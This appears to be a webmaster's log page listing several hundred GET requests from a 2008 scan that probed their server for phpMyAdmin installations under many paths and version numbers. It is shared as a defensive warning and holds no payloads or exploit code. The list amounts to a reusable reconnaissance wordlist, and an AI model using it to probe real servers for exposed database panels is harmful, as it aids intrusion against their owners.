System: Web Server Attacks and Exploits
The number of attacks from rogue servers continues to increase. Previously I was recording details of individual attacks, but that's no longer feasible. Instead I've started a new page which will simply list the requested files and not discuss the payload or other attributes of the attack.
If your server has files matching any of the requests listed here you should be very attentive to updating and otherwise securing those applications.
PHP Database Exploit
The following attack came from an address at *.static.qsc.de between 03:59 and 04:00 GMT on 31 March 2008.
GET /PMA/main.php
GET /PMA/read_dump.phpmain.php
GET /PMA2005/main.php
GET /PMA2006/main.php
GET /admin/PMA2005/main.php
GET /admin/PMA2006/main.php
GET /admin/db/main.php
GET /admin/main.php
GET /admin/myadmin/main.php
GET /admin/mysql-admin/main.php
GET /admin/mysql/main.php
GET /admin/mysqladmin/main.php
GET /admin/mysqlmanager/main.php
GET /admin/p/m/a/main.php
GET /admin/pMA/main.php
GET /admin/php-my-admin/main.php
GET /admin/php-myadmin/main.php
GET /admin/phpMyAdmin-2.2.3/main.php
GET /admin/phpMyAdmin-2.2.6/main.php
GET /admin/phpMyAdmin-2.5.1/main.php
GET /admin/phpMyAdmin-2.5.4/main.php
GET /admin/phpMyAdmin-2.5.5-pl1/main.php
GET /admin/phpMyAdmin-2.5.5-rc1/main.php
GET /admin/phpMyAdmin-2.5.5-rc2/main.php
GET /admin/phpMyAdmin-2.5.5/main.php
GET /admin/phpMyAdmin-2.5.6-rc1/main.php
GET /admin/phpMyAdmin-2.5.6-rc2/main.php
GET /admin/phpMyAdmin-2.5.6/main.php
GET /admin/phpMyAdmin-2.5.7-pl1/main.php
GET /admin/phpMyAdmin-2.5.7/main.php
GET /admin/phpMyAdmin-2.6.0-alpha/main.php
GET /admin/phpMyAdmin-2.6.0-alpha2/main.php
GET /admin/phpMyAdmin-2.6.0-beta1/main.php
GET /admin/phpMyAdmin-2.6.0-beta2/main.php
GET /admin/phpMyAdmin-2.6.0-pl1/main.php
GET /admin/phpMyAdmin-2.6.0-pl2/main.php
GET /admin/phpMyAdmin-2.6.0-pl3/main.php
GET /admin/phpMyAdmin-2.6.0-rc1/main.php
GET /admin/phpMyAdmin-2.6.0-rc2/main.php
GET /admin/phpMyAdmin-2.6.0-rc3/main.php
GET /admin/phpMyAdmin-2.6.0/main.php
GET /admin/phpMyAdmin-2.6.1-pl1/main.php
GET /admin/phpMyAdmin-2.6.1-pl2/main.php
GET /admin/phpMyAdmin-2.6.1-pl3/main.php
GET /admin/phpMyAdmin-2.6.1-rc1/main.php
GET /admin/phpMyAdmin-2.6.1-rc2/main.php
GET /admin/phpMyAdmin-2.6.1/main.php
GET /admin/phpMyAdmin-2.6.2-beta1/main.php
GET /admin/phpMyAdmin-2.6.2-pl1/main.php
GET /admin/phpMyAdmin-2.6.2-rc1/main.php
GET /admin/phpMyAdmin-2.6.2/main.php
GET /admin/phpMyAdmin-2.6.3-pl1/main.php
GET /admin/phpMyAdmin-2.6.3-rc1/main.php
GET /admin/phpMyAdmin-2.6.3/main.php
GET /admin/phpMyAdmin-2.6.4-pl1/main.php
GET /admin/phpMyAdmin-2.6.4-pl2/main.php
GET /admin/phpMyAdmin-2.6.4-pl3/main.php
GET /admin/phpMyAdmin-2.6.4-pl4/main.php
GET /admin/phpMyAdmin-2.6.4-rc1/main.php
GET /admin/phpMyAdmin-2.6.4/main.php
GET /admin/phpMyAdmin-2.7.0-beta1/main.php
GET /admin/phpMyAdmin-2.7.0-pl1/main.php
GET /admin/phpMyAdmin-2.7.0-pl2/main.php
GET /admin/phpMyAdmin-2.7.0-rc1/main.php
GET /admin/phpMyAdmin-2.7.0/main.php
GET /admin/phpMyAdmin-2.8.0-beta1/main.php
GET /admin/phpMyAdmin-2.8.0-rc1/main.php
GET /admin/phpMyAdmin-2.8.0-rc2/main.php
GET /admin/phpMyAdmin-2.8.0.1/main.php
GET /admin/phpMyAdmin-2.8.0.2/main.php
GET /admin/phpMyAdmin-2.8.0.3/main.php
GET /admin/phpMyAdmin-2.8.0.4/main.php
GET /admin/phpMyAdmin-2.8.0/main.php
GET /admin/phpMyAdmin-2.8.1-rc1/main.php
GET /admin/phpMyAdmin-2.8.1/main.php
GET /admin/phpMyAdmin-2.8.2/main.php
GET /admin/phpMyAdmin-2/main.php
GET /admin/phpMyAdmin/main.php
GET /admin/phpMyAdmin2/main.php
GET /admin/phpmanager/main.php
GET /admin/phpmy-admin/main.php
GET /admin/phpmyadmin/main.php
GET /admin/phpmyadmin/read_dump.phpmain.php
GET /admin/phpmyadmin2/main.php
GET /admin/pma/read_dump.phpmain.php
GET /admin/pma2005/main.php
GET /admin/pma2006/main.php
GET /admin/read_dump.phpmain.php
GET /admin/sqladmin/main.php
GET /admin/sqlmanager/main.php
GET /admin/sqlweb/main.php
GET /admin/sysadmin/main.php
GET /admin/web/main.php
GET /admin/webadmin/main.php
GET /admin/webdb/main.php
GET /admin/websql/main.php
GET /administrator/admin/main.php
GET /administrator/db/main.php
GET /administrator/dbadmin/main.php
GET /administrator/main.php
GET /administrator/myadmin/main.php
GET /administrator/mysql-admin/main.php
GET /administrator/mysql/main.php
GET /administrator/mysqladmin/main.php
GET /administrator/mysqlmanager/main.php
GET /administrator/p/m/a/main.php
GET /administrator/pMA/main.php
GET /administrator/pMA2005/main.php
GET /administrator/pMA2006/main.php
GET /administrator/php-my-admin/main.php
GET /administrator/php-myadmin/main.php
GET /administrator/phpMyAdmin-2.2.3/main.php
GET /administrator/phpMyAdmin-2.2.6/main.php
GET /administrator/phpMyAdmin-2.5.1/main.php
GET /administrator/phpMyAdmin-2.5.4/main.php
GET /administrator/phpMyAdmin-2.5.5-pl1/main.php
GET /administrator/phpMyAdmin-2.5.5-rc1/main.php
GET /administrator/phpMyAdmin-2.5.5-rc2/main.php
GET /administrator/phpMyAdmin-2.5.5/main.php
GET /administrator/phpMyAdmin-2.5.6-rc1/main.php
GET /administrator/phpMyAdmin-2.5.6-rc2/main.php
GET /administrator/phpMyAdmin-2.5.6/main.php
GET /administrator/phpMyAdmin-2.5.7-pl1/main.php
GET /administrator/phpMyAdmin-2.5.7/main.php
GET /administrator/phpMyAdmin-2.6.0-alpha/main.php
GET /administrator/phpMyAdmin-2.6.0-alpha2/main.php
GET /administrator/phpMyAdmin-2.6.0-beta1/main.php
GET /administrator/phpMyAdmin-2.6.0-beta2/main.php
GET /administrator/phpMyAdmin-2.6.0-pl1/main.php
GET /administrator/phpMyAdmin-2.6.0-pl2/main.php
GET /administrator/phpMyAdmin-2.6.0-pl3/main.php
GET /administrator/phpMyAdmin-2.6.0-rc1/main.php
GET /administrator/phpMyAdmin-2.6.0-rc2/main.php
GET /administrator/phpMyAdmin-2.6.0-rc3/main.php
GET /administrator/phpMyAdmin-2.6.0/main.php
GET /administrator/phpMyAdmin-2.6.1-pl1/main.php
GET /administrator/phpMyAdmin-2.6.1-pl2/main.php
GET /administrator/phpMyAdmin-2.6.1-pl3/main.php
GET /administrator/phpMyAdmin-2.6.1-rc1/main.php
GET /administrator/phpMyAdmin-2.6.1-rc2/main.php
GET /administrator/phpMyAdmin-2.6.1/main.php
GET /administrator/phpMyAdmin-2.6.2-beta1/main.php
GET /administrator/phpMyAdmin-2.6.2-pl1/main.php
GET /administrator/phpMyAdmin-2.6.2-rc1/main.php
GET /administrator/phpMyAdmin-2.6.2/main.php
GET /administrator/phpMyAdmin-2.6.3-pl1/main.php
GET /administrator/phpMyAdmin-2.6.3-rc1/main.php
GET /administrator/phpMyAdmin-2.6.3/main.php
GET /administrator/phpMyAdmin-2.6.4-pl1/main.php
GET /administrator/phpMyAdmin-2.6.4-pl2/main.php
GET /administrator/phpMyAdmin-2.6.4-pl3/main.php
GET /administrator/phpMyAdmin-2.6.4-pl4/main.php
GET /administrator/phpMyAdmin-2.6.4-rc1/main.php
GET /administrator/phpMyAdmin-2.6.4/main.php
GET /administrator/phpMyAdmin-2.7.0-beta1/main.php
GET /administrator/phpMyAdmin-2.7.0-pl1/main.php
GET /administrator/phpMyAdmin-2.7.0-pl2/main.php
GET /administrator/phpMyAdmin-2.7.0-rc1/main.php
GET /administrator/phpMyAdmin-2.7.0/main.php
GET /administrator/phpMyAdmin-2.8.0-beta1/main.php
GET /administrator/phpMyAdmin-2.8.0-rc1/main.php
GET /administrator/phpMyAdmin-2.8.0-rc2/main.php
GET /administrator/phpMyAdmin-2.8.0.1/main.php
GET /administrator/phpMyAdmin-2.8.0.2/main.php
GET /administrator/phpMyAdmin-2.8.0.3/main.php
GET /administrator/phpMyAdmin-2.8.0.4/main.php
GET /administrator/phpMyAdmin-2.8.0/main.php
GET /administrator/phpMyAdmin-2.8.1-rc1/main.php
GET /administrator/phpMyAdmin-2.8.1/main.php
GET /administrator/phpMyAdmin-2.8.2/main.php
GET /administrator/phpMyAdmin-2/main.php
GET /administrator/phpMyAdmin/main.php
GET /administrator/phpMyAdmin2/main.php
GET /administrator/phpmanager/main.php
GET /administrator/phpmy-admin/main.php
GET /administrator/phpmyadmin/main.php
GET /administrator/phpmyadmin2/main.php
GET /administrator/pma2005/main.php
GET /administrator/pma2006/main.php
GET /administrator/sqlmanager/main.php
GET /administrator/sqlweb/main.php
GET /administrator/web/main.php
GET /administrator/webadmin/main.php
GET /administrator/webdb/main.php
GET /administrator/websql/main.php
GET /database/admin/main.php
GET /database/database-admin/main.php
GET /database/database/main.php
GET /database/databaseadmin/main.php
GET /database/databasemanager/main.php
GET /database/databaseweb/main.php
GET /database/main.php
GET /database/myadmin/main.php
GET /database/p/m/a/main.php
GET /database/pMA/main.php
GET /database/pMA2005/main.php
GET /database/pMA2006/main.php
GET /database/php-my-admin/main.php
GET /database/php-myadmin/main.php
GET /database/phpMyAdmin-2.2.3/main.php
GET /database/phpMyAdmin-2.2.6/main.php
GET /database/phpMyAdmin-2.5.1/main.php
GET /database/phpMyAdmin-2.5.4/main.php
GET /database/phpMyAdmin-2.5.5-pl1/main.php
GET /database/phpMyAdmin-2.5.5-rc1/main.php
GET /database/phpMyAdmin-2.5.5-rc2/main.php
GET /database/phpMyAdmin-2.5.5/main.php
GET /database/phpMyAdmin-2.5.6-rc1/main.php
GET /database/phpMyAdmin-2.5.6-rc2/main.php
GET /database/phpMyAdmin-2.5.6/main.php
GET /database/phpMyAdmin-2.5.7-pl1/main.php
GET /database/phpMyAdmin-2.5.7/main.php
GET /database/phpMyAdmin-2.6.0-alpha/main.php
GET /database/phpMyAdmin-2.6.0-alpha2/main.php
GET /database/phpMyAdmin-2.6.0-beta1/main.php
GET /database/phpMyAdmin-2.6.0-beta2/main.php
GET /database/phpMyAdmin-2.6.0-pl1/main.php
GET /database/phpMyAdmin-2.6.0-pl2/main.php
GET /database/phpMyAdmin-2.6.0-pl3/main.php
GET /database/phpMyAdmin-2.6.0-rc1/main.php
GET /database/phpMyAdmin-2.6.0-rc2/main.php
GET /database/phpMyAdmin-2.6.0-rc3/main.php
GET /database/phpMyAdmin-2.6.0/main.php
GET /database/phpMyAdmin-2.6.1-pl1/main.php
GET /database/phpMyAdmin-2.6.1-pl2/main.php
GET /database/phpMyAdmin-2.6.1-pl3/main.php
GET /database/phpMyAdmin-2.6.1-rc1/main.php
GET /database/phpMyAdmin-2.6.1-rc2/main.php
GET /database/phpMyAdmin-2.6.1/main.php
GET /database/phpMyAdmin-2.6.2-beta1/main.php
GET /database/phpMyAdmin-2.6.2-pl1/main.php
GET /database/phpMyAdmin-2.6.2-rc1/main.php
GET /database/phpMyAdmin-2.6.2/main.php
GET /database/phpMyAdmin-2.6.3-pl1/main.php
GET /database/phpMyAdmin-2.6.3-rc1/main.php
GET /database/phpMyAdmin-2.6.3/main.php
GET /database/phpMyAdmin-2.6.4-pl1/main.php
GET /database/phpMyAdmin-2.6.4-pl2/main.php
GET /database/phpMyAdmin-2.6.4-pl3/main.php
GET /database/phpMyAdmin-2.6.4-pl4/main.php
GET /database/phpMyAdmin-2.6.4-rc1/main.php
GET /database/phpMyAdmin-2.6.4/main.php
GET /database/phpMyAdmin-2.7.0-beta1/main.php
GET /database/phpMyAdmin-2.7.0-pl1/main.php
GET /database/phpMyAdmin-2.7.0-pl2/main.php
GET /database/phpMyAdmin-2.7.0-rc1/main.php
GET /database/phpMyAdmin-2.7.0/main.php
GET /database/phpMyAdmin-2.8.0-beta1/main.php
GET /database/phpMyAdmin-2.8.0-rc1/main.php
GET /database/phpMyAdmin-2.8.0-rc2/main.php
GET /database/phpMyAdmin-2.8.0.1/main.php
GET /database/phpMyAdmin-2.8.0.2/main.php
GET /database/phpMyAdmin-2.8.0.3/main.php
GET /database/phpMyAdmin-2.8.0.4/main.php
GET /database/phpMyAdmin-2.8.0/main.php
GET /database/phpMyAdmin-2.8.1-rc1/main.php
GET /database/phpMyAdmin-2.8.1/main.php
GET /database/phpMyAdmin-2.8.2/main.php
GET /database/phpMyAdmin-2/main.php
GET /database/phpMyAdmin/main.php
GET /database/phpMyAdmin2/main.php
GET /database/phpmanager/main.php
GET /database/phpmy-admin/main.php
GET /database/phpmyadmin/main.php
GET /database/phpmyadmin2/main.php
GET /database/pma2005/main.php
GET /database/pma2006/main.php
GET /database/web/main.php
GET /database/webadmin/main.php
GET /database/webdb/main.php
GET /database/websql/main.php
GET /db/admin/main.php
GET /db/db-admin/main.php
GET /db/db/main.php
GET /db/dbadmin/main.php
GET /db/dbmanager/main.php
GET /db/dbweb/main.php
GET /db/main.php
GET /db/myadmin/main.php
GET /db/p/m/a/main.php
GET /db/pMA/main.php
GET /db/pMA2005/main.php
GET /db/pMA2006/main.php
GET /db/php-my-admin/main.php
GET /db/php-myadmin/main.php
GET /db/phpMyAdmin-2.2.3/main.php
GET /db/phpMyAdmin-2.2.6/main.php
GET /db/phpMyAdmin-2.5.1/main.php
GET /db/phpMyAdmin-2.5.4/main.php
GET /db/phpMyAdmin-2.5.5-pl1/main.php
GET /db/phpMyAdmin-2.5.5-rc1/main.php
GET /db/phpMyAdmin-2.5.5-rc2/main.php
GET /db/phpMyAdmin-2.5.5/main.php
GET /db/phpMyAdmin-2.5.6-rc1/main.php
GET /db/phpMyAdmin-2.5.6-rc2/main.php
GET /db/phpMyAdmin-2.5.6/main.php
GET /db/phpMyAdmin-2.5.7-pl1/main.php
GET /db/phpMyAdmin-2.5.7/main.php
GET /db/phpMyAdmin-2.6.0-alpha/main.php
GET /db/phpMyAdmin-2.6.0-alpha2/main.php
GET /db/phpMyAdmin-2.6.0-beta1/main.php
GET /db/phpMyAdmin-2.6.0-beta2/main.php
GET /db/phpMyAdmin-2.6.0-pl1/main.php
GET /db/phpMyAdmin-2.6.0-pl2/main.php
GET /db/phpMyAdmin-2.6.0-pl3/main.php
GET /db/phpMyAdmin-2.6.0-rc1/main.php
GET /db/phpMyAdmin-2.6.0-rc2/main.php
GET /db/phpMyAdmin-2.6.0-rc3/main.php
GET /db/phpMyAdmin-2.6.0/main.php
GET /db/phpMyAdmin-2.6.1-pl1/main.php
GET /db/phpMyAdmin-2.6.1-pl2/main.php
GET /db/phpMyAdmin-2.6.1-pl3/main.php
GET /db/phpMyAdmin-2.6.1-rc1/main.php
GET /db/phpMyAdmin-2.6.1-rc2/main.php
GET /db/phpMyAdmin-2.6.1/main.php
GET /db/phpMyAdmin-2.6.2-beta1/main.php
GET /db/phpMyAdmin-2.6.2-pl1/main.php
GET /db/phpMyAdmin-2.6.2-rc1/main.php
GET /db/phpMyAdmin-2.6.2/main.php
GET /db/phpMyAdmin-2.6.3-pl1/main.php
GET /db/phpMyAdmin-2.6.3-rc1/main.php
GET /db/phpMyAdmin-2.6.3/main.php
GET /db/phpMyAdmin-2.6.4-pl1/main.php
GET /db/phpMyAdmin-2.6.4-pl2/main.php
GET /db/phpMyAdmin-2.6.4-pl3/main.php
GET /db/phpMyAdmin-2.6.4-pl4/main.php
GET /db/phpMyAdmin-2.6.4-rc1/main.php
GET /db/phpMyAdmin-2.6.4/main.php
GET /db/phpMyAdmin-2.7.0-beta1/main.php
GET /db/phpMyAdmin-2.7.0-pl1/main.php
GET /db/phpMyAdmin-2.7.0-pl2/main.php
GET /db/phpMyAdmin-2.7.0-rc1/main.php
GET /db/phpMyAdmin-2.7.0/main.php
GET /db/phpMyAdmin-2.8.0-beta1/main.php
GET /db/phpMyAdmin-2.8.0-rc1/main.php
GET /db/phpMyAdmin-2.8.0-rc2/main.php
GET /db/phpMyAdmin-2.8.0.1/main.php
GET /db/phpMyAdmin-2.8.0.2/main.php
GET /db/phpMyAdmin-2.8.0.3/main.php
GET /db/phpMyAdmin-2.8.0.4/main.php
GET /db/phpMyAdmin-2.8.0/main.php
GET /db/phpMyAdmin-2.8.1-rc1/main.php
GET /db/phpMyAdmin-2.8.1/main.php
GET /db/phpMyAdmin-2.8.2/main.php
GET /db/phpMyAdmin-2/main.php
GET /db/phpMyAdmin/main.php
GET /db/phpMyAdmin2/main.php
GET /db/phpmanager/main.php
GET /db/phpmy-admin/main.php
GET /db/phpmyadmin/main.php
GET /db/phpmyadmin2/main.php
GET /db/pma2005/main.php
GET /db/pma2006/main.php
GET /db/read_dump.phpmain.php
GET /db/web/main.php
GET /db/webadmin/main.php
GET /db/webdb/main.php
GET /db/websql/main.php
GET /dbadmin/main.php
GET /dbadmin/read_dump.phpmain.php
GET /myadmin/main.php
GET /myadmin/read_dump.phpmain.php
GET /mysql-admin/main.php
GET /mysql/admin/main.php
GET /mysql/db/main.php
GET /mysql/dbadmin/main.php
GET /mysql/main.php
GET /mysql/myadmin/main.php
GET /mysql/mysql-admin/main.php
GET /mysql/mysql/main.php
GET /mysql/mysqladmin/main.php
GET /mysql/mysqlmanager/main.php
GET /mysql/p/m/a/main.php
GET /mysql/pMA/main.php
GET /mysql/pMA2005/main.php
GET /mysql/pMA2006/main.php
GET /mysql/php-my-admin/main.php
GET /mysql/php-myadmin/main.php
GET /mysql/phpMyAdmin-2.2.3/main.php
GET /mysql/phpMyAdmin-2.2.6/main.php
GET /mysql/phpMyAdmin-2.5.1/main.php
GET /mysql/phpMyAdmin-2.5.4/main.php
GET /mysql/phpMyAdmin-2.5.5-pl1/main.php
GET /mysql/phpMyAdmin-2.5.5-rc1/main.php
GET /mysql/phpMyAdmin-2.5.5-rc2/main.php
GET /mysql/phpMyAdmin-2.5.5/main.php
GET /mysql/phpMyAdmin-2.5.6-rc1/main.php
GET /mysql/phpMyAdmin-2.5.6-rc2/main.php
GET /mysql/phpMyAdmin-2.5.6/main.php
GET /mysql/phpMyAdmin-2.5.7-pl1/main.php
GET /mysql/phpMyAdmin-2.5.7/main.php
GET /mysql/phpMyAdmin-2.6.0-alpha/main.php
GET /mysql/phpMyAdmin-2.6.0-alpha2/main.php
GET /mysql/phpMyAdmin-2.6.0-beta1/main.php
GET /mysql/phpMyAdmin-2.6.0-beta2/main.php
GET /mysql/phpMyAdmin-2.6.0-pl1/main.php
GET /mysql/phpMyAdmin-2.6.0-pl2/main.php
GET /mysql/phpMyAdmin-2.6.0-pl3/main.php
GET /mysql/phpMyAdmin-2.6.0-rc1/main.php
GET /mysql/phpMyAdmin-2.6.0-rc2/main.php
GET /mysql/phpMyAdmin-2.6.0-rc3/main.php
GET /mysql/phpMyAdmin-2.6.0/main.php
GET /mysql/phpMyAdmin-2.6.1-pl1/main.php
GET /mysql/phpMyAdmin-2.6.1-pl2/main.php
GET /mysql/phpMyAdmin-2.6.1-pl3/main.php
GET /mysql/phpMyAdmin-2.6.1-rc1/main.php
GET /mysql/phpMyAdmin-2.6.1-rc2/main.php
GET /mysql/phpMyAdmin-2.6.1/main.php
GET /mysql/phpMyAdmin-2.6.2-beta1/main.php
GET /mysql/phpMyAdmin-2.6.2-pl1/main.php
GET /mysql/phpMyAdmin-2.6.2-rc1/main.php
GET /mysql/phpMyAdmin-2.6.2/main.php
GET /mysql/phpMyAdmin-2.6.3-pl1/main.php
GET /mysql/phpMyAdmin-2.6.3-rc1/main.php
GET /mysql/phpMyAdmin-2.6.3/main.php
GET /mysql/phpMyAdmin-2.6.4-pl1/main.php
GET /mysql/phpMyAdmin-2.6.4-pl2/main.php
GET /mysql/phpMyAdmin-2.6.4-pl3/main.php
GET /mysql/phpMyAdmin-2.6.4-pl4/main.php
GET /mysql/phpMyAdmin-2.6.4-rc1/main.php
GET /mysql/phpMyAdmin-2.6.4/main.php
GET /mysql/phpMyAdmin-2.7.0-beta1/main.php
GET /mysql/phpMyAdmin-2.7.0-pl1/main.php
GET /mysql/phpMyAdmin-2.7.0-pl2/main.php
GET /mysql/phpMyAdmin-2.7.0-rc1/main.php
GET /mysql/phpMyAdmin-2.7.0/main.php
GET /mysql/phpMyAdmin-2.8.0-beta1/main.php
GET /mysql/phpMyAdmin-2.8.0-rc1/main.php
GET /mysql/phpMyAdmin-2.8.0-rc2/main.php
GET /mysql/phpMyAdmin-2.8.0.1/main.php
GET /mysql/phpMyAdmin-2.8.0.2/main.php
GET /mysql/phpMyAdmin-2.8.0.3/main.php
GET /mysql/phpMyAdmin-2.8.0.4/main.php
GET /mysql/phpMyAdmin-2.8.0/main.php
GET /mysql/phpMyAdmin-2.8.1-rc1/main.php
GET /mysql/phpMyAdmin-2.8.1/main.php
GET /mysql/phpMyAdmin-2.8.2/main.php
GET /mysql/phpMyAdmin-2/main.php
GET /mysql/phpMyAdmin/main.php
GET /mysql/phpMyAdmin2/main.php
GET /mysql/phpmanager/main.php
GET /mysql/phpmy-admin/main.php
GET /mysql/phpmyadmin/main.php
GET /mysql/phpmyadmin2/main.php
GET /mysql/pma2005/main.php
GET /mysql/pma2006/main.php
GET /mysql/read_dump.phpmain.php
GET /mysql/sqlmanager/main.php
GET /mysql/sqlweb/main.php
GET /mysql/web/main.php
GET /mysql/webadmin/main.php
GET /mysql/webdb/main.php
GET /mysql/websql/main.php
GET /mysqladmin/main.php
GET /mysqladmin/read_dump.phpmain.php
GET /mysqlmanager/main.php
GET /p/m/a/main.php
GET /padmin/read_dump.phpmain.php
GET /php-my-admin/main.php
GET /php-myadmin/main.php
GET /phpMyAdmin
GET /phpMyAdmin-2.2.3/main.php
GET /phpMyAdmin-2.2.3/read_dump.phpmain.php
GET /phpMyAdmin-2.2.6/main.php
GET /phpMyAdmin-2.2.7-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.5.1/main.php
GET /phpMyAdmin-2.5.4/main.php
GET /phpMyAdmin-2.5.5-pl1/main.php
GET /phpMyAdmin-2.5.5-rc1/main.php
GET /phpMyAdmin-2.5.5-rc2/main.php
GET /phpMyAdmin-2.5.5/main.php
GET /phpMyAdmin-2.5.6-rc1/main.php
GET /phpMyAdmin-2.5.6-rc2/main.php
GET /phpMyAdmin-2.5.6/main.php
GET /phpMyAdmin-2.5.6/read_dump.phpmain.php
GET /phpMyAdmin-2.5.7-pl1/main.php
GET /phpMyAdmin-2.5.7-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.5.7/main.php
GET /phpMyAdmin-2.6.0-alpha/main.php
GET /phpMyAdmin-2.6.0-alpha2/main.php
GET /phpMyAdmin-2.6.0-beta1/main.php
GET /phpMyAdmin-2.6.0-beta2/main.php
GET /phpMyAdmin-2.6.0-pl1/main.php
GET /phpMyAdmin-2.6.0-pl2/main.php
GET /phpMyAdmin-2.6.0-pl3/main.php
GET /phpMyAdmin-2.6.0-pl3/read_dump.phpmain.php
GET /phpMyAdmin-2.6.0-rc1/main.php
GET /phpMyAdmin-2.6.0-rc2/main.php
GET /phpMyAdmin-2.6.0-rc3/main.php
GET /phpMyAdmin-2.6.0/main.php
GET /phpMyAdmin-2.6.0/read_dump.phpmain.php
GET /phpMyAdmin-2.6.1-pl1/main.php
GET /phpMyAdmin-2.6.1-pl2/main.php
GET /phpMyAdmin-2.6.1-pl3/main.php
GET /phpMyAdmin-2.6.1-pl3/read_dump.phpmain.php
GET /phpMyAdmin-2.6.1-rc1/main.php
GET /phpMyAdmin-2.6.1-rc2/main.php
GET /phpMyAdmin-2.6.1/main.php
GET /phpMyAdmin-2.6.2-beta1/main.php
GET /phpMyAdmin-2.6.2-pl1/main.php
GET /phpMyAdmin-2.6.2-rc1/main.php
GET /phpMyAdmin-2.6.2/main.php
GET /phpMyAdmin-2.6.3-pl1/main.php
GET /phpMyAdmin-2.6.3-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.6.3-rc1/main.php
GET /phpMyAdmin-2.6.3/main.php
GET /phpMyAdmin-2.6.4-pl1/main.php
GET /phpMyAdmin-2.6.4-pl2/main.php
GET /phpMyAdmin-2.6.4-pl3/main.php
GET /phpMyAdmin-2.6.4-pl4/main.php
GET /phpMyAdmin-2.6.4-rc1/main.php
GET /phpMyAdmin-2.6.4/main.php
GET /phpMyAdmin-2.6.4/read_dump.phpmain.php
GET /phpMyAdmin-2.7.0-beta1/main.php
GET /phpMyAdmin-2.7.0-pl1/main.php
GET /phpMyAdmin-2.7.0-pl2/main.php
GET /phpMyAdmin-2.7.0-rc1/main.php
GET /phpMyAdmin-2.7.0/main.php
GET /phpMyAdmin-2.8.0-beta1/main.php
GET /phpMyAdmin-2.8.0-rc1/main.php
GET /phpMyAdmin-2.8.0-rc2/main.php
GET /phpMyAdmin-2.8.0.1/main.php
GET /phpMyAdmin-2.8.0.2/main.php
GET /phpMyAdmin-2.8.0.3/main.php
GET /phpMyAdmin-2.8.0.4/main.php
GET /phpMyAdmin-2.8.0/main.php
GET /phpMyAdmin-2.8.1-rc1/main.php
GET /phpMyAdmin-2.8.1/main.php
GET /phpMyAdmin-2.8.2/main.php
GET /phpMyAdmin-2/main.php
GET /phpMyAdmin/main.php
GET /phpMyAdmin2/main.php
GET /phpadmin/read_dump.phpmain.php
GET /phpmanager/main.php
GET /phpmy-admin/main.php
GET /phpmyadmin/main.php
GET /phpmyadmin/read_dump.phpmain.php
GET /phpmyadmin1/read_dump.phpmain.php
GET /phpmyadmin2/main.php
GET /phpmyadmin2/read_dump.phpmain.php
GET /pma2005/main.php
GET /pma2006/main.php
GET /sql/admin/main.php
GET /sql/db/main.php
GET /sql/dbadmin/main.php
GET /sql/main.php
GET /sql/myadmin/main.php
GET /sql/p/m/a/main.php
GET /sql/pMA/main.php
GET /sql/pMA2005/main.php
GET /sql/pMA2006/main.php
GET /sql/php-my-admin/main.php
GET /sql/php-myadmin/main.php
GET /sql/phpMyAdmin-2.2.3/main.php
GET /sql/phpMyAdmin-2.2.6/main.php
GET /sql/phpMyAdmin-2.5.1/main.php
GET /sql/phpMyAdmin-2.5.4/main.php
GET /sql/phpMyAdmin-2.5.5-pl1/main.php
GET /sql/phpMyAdmin-2.5.5-rc1/main.php
GET /sql/phpMyAdmin-2.5.5-rc2/main.php
GET /sql/phpMyAdmin-2.5.5/main.php
GET /sql/phpMyAdmin-2.5.6-rc1/main.php
GET /sql/phpMyAdmin-2.5.6-rc2/main.php
GET /sql/phpMyAdmin-2.5.6/main.php
GET /sql/phpMyAdmin-2.5.7-pl1/main.php
GET /sql/phpMyAdmin-2.5.7/main.php
GET /sql/phpMyAdmin-2.6.0-alpha/main.php
GET /sql/phpMyAdmin-2.6.0-alpha2/main.php
GET /sql/phpMyAdmin-2.6.0-beta1/main.php
GET /sql/phpMyAdmin-2.6.0-beta2/main.php
GET /sql/phpMyAdmin-2.6.0-pl1/main.php
GET /sql/phpMyAdmin-2.6.0-pl2/main.php
GET /sql/phpMyAdmin-2.6.0-pl3/main.php
GET /sql/phpMyAdmin-2.6.0-rc1/main.php
GET /sql/phpMyAdmin-2.6.0-rc2/main.php
GET /sql/phpMyAdmin-2.6.0-rc3/main.php
GET /sql/phpMyAdmin-2.6.0/main.php
GET /sql/phpMyAdmin-2.6.1-pl1/main.php
GET /sql/phpMyAdmin-2.6.1-pl2/main.php
GET /sql/phpMyAdmin-2.6.1-pl3/main.php
GET /sql/phpMyAdmin-2.6.1-rc1/main.php
GET /sql/phpMyAdmin-2.6.1-rc2/main.php
GET /sql/phpMyAdmin-2.6.1/main.php
GET /sql/phpMyAdmin-2.6.2-beta1/main.php
GET /sql/phpMyAdmin-2.6.2-pl1/main.php
GET /sql/phpMyAdmin-2.6.2-rc1/main.php
GET /sql/phpMyAdmin-2.6.2/main.php
GET /sql/phpMyAdmin-2.6.3-pl1/main.php
GET /sql/phpMyAdmin-2.6.3-rc1/main.php
GET /sql/phpMyAdmin-2.6.3/main.php
GET /sql/phpMyAdmin-2.6.4-pl1/main.php
GET /sql/phpMyAdmin-2.6.4-pl2/main.php
GET /sql/phpMyAdmin-2.6.4-pl3/main.php
GET /sql/phpMyAdmin-2.6.4-pl4/main.php
GET /sql/phpMyAdmin-2.6.4-rc1/main.php
GET /sql/phpMyAdmin-2.6.4/main.php
GET /sql/phpMyAdmin-2.7.0-beta1/main.php
GET /sql/phpMyAdmin-2.7.0-pl1/main.php
GET /sql/phpMyAdmin-2.7.0-pl2/main.php
GET /sql/phpMyAdmin-2.7.0-rc1/main.php
GET /sql/phpMyAdmin-2.7.0/main.php
GET /sql/phpMyAdmin-2.8.0-beta1/main.php
GET /sql/phpMyAdmin-2.8.0-rc1/main.php
GET /sql/phpMyAdmin-2.8.0-rc2/main.php
GET /sql/phpMyAdmin-2.8.0.1/main.php
GET /sql/phpMyAdmin-2.8.0.2/main.php
GET /sql/phpMyAdmin-2.8.0.3/main.php
GET /sql/phpMyAdmin-2.8.0.4/main.php
GET /sql/phpMyAdmin-2.8.0/main.php
GET /sql/phpMyAdmin-2.8.1-rc1/main.php
GET /sql/phpMyAdmin-2.8.1/main.php
GET /sql/phpMyAdmin-2.8.2/main.php
GET /sql/phpMyAdmin-2/main.php
GET /sql/phpMyAdmin/main.php
GET /sql/phpMyAdmin2/main.php
GET /sql/phpmanager/main.php
GET /sql/phpmy-admin/main.php
GET /sql/phpmyadmin/main.php
GET /sql/phpmyadmin2/main.php
GET /sql/pma2005/main.php
GET /sql/pma2006/main.php
GET /sql/sql-admin/main.php
